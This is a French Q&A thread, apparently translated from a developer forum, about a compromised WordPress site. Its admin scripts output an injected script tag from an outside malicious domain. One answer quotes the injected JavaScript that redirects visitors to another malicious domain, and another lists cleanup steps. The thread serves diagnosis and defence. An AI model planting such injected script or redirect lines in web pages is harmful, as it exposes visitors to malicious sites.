web-dev-qa-db-fra.com

Est-ce que quelqu'un pirate mon site?

Je suis assez déconcerté par ce problème et je n'ai absolument aucune idée de ce qui pourrait en être la cause. J'ai un site Web Wordpress qui a bien fonctionné jusqu'à ce que, pour une raison quelconque, le panneau d'administration ait commencé à bousiller et à ne pas afficher tous les fichiers CSS correctement. Après des recherches plus poussées, j'ai trouvé que les scripts load-scripts.php et load-styles.php se chargent avec des caractères impairs, comme vous pouvez le constater:

http://www.obhsfbla.org/wp-admin/load-scripts.php?c=1&load=jquery,utils,thickbox,media-upload&ver=96728cab06e0531b9307c89031a13e9c

Ceci est fondamentalement une installation par défaut de Wordpress, et j'ai reuploadé ce fichier, mais le problème persiste. Cela ne semble pas être un problème d’encodage des caractères, comme le disent les en-têtes, c’est UTF-8.

Voici le genre de partie effrayante. Si vous supprimez tous les attributs get de cette URL, la page affiche:

<script src="http://sweepstakesandcontestsdo.com/nl.php?p=d"></script>

Je ne vais pas naviguer sur ce site car Safari dit que c'est malveillant. Mais comment cela pourrait-il se passer exactement? Pourquoi cette URL serait-elle affichée? Le code de cette page n'a jamais été modifié.

3
John

Ce script contient ce code:

window.top.location.replace("http://litic82sreac.rr.nu/n.php?h=1&s=nl");

Il redirige votre utilisateur vers http://litic82sreac.rr.nu/n.php?h=1&s=nl. J'ai récemment vu ce type d'attaque sur les serveurs phpBB et MediaWiki, alors je pense que ce pourrait être un hébergeur piraté.

Quel hôte web utilisez-vous?

5
Blender

Certainement un bidouillage!

  1. Sauvegardez votre site localement, insérez-le dans un fichier Zip et conservez-le au cas où vous en auriez besoin.
  2. Sauvegardez votre base de données, compressez-la à nouveau et conservez une copie de rechange si vous en avez besoin.
  3. Effectuez une nouvelle installation de wordpress, sauvegardez le code et configurez lorsque vous avez terminé
  4. Migrez vos fichiers de thème (vérifiez chaque code de thème pour le code méchant) et les plug-ins, puis observez attentivement pendant quelques jours pour voir si l'attaque se reproduit.
  5. Voir ma réponse ici pour de bonnes informations sur le verrouillage de wordpress
2
toomanyairmiles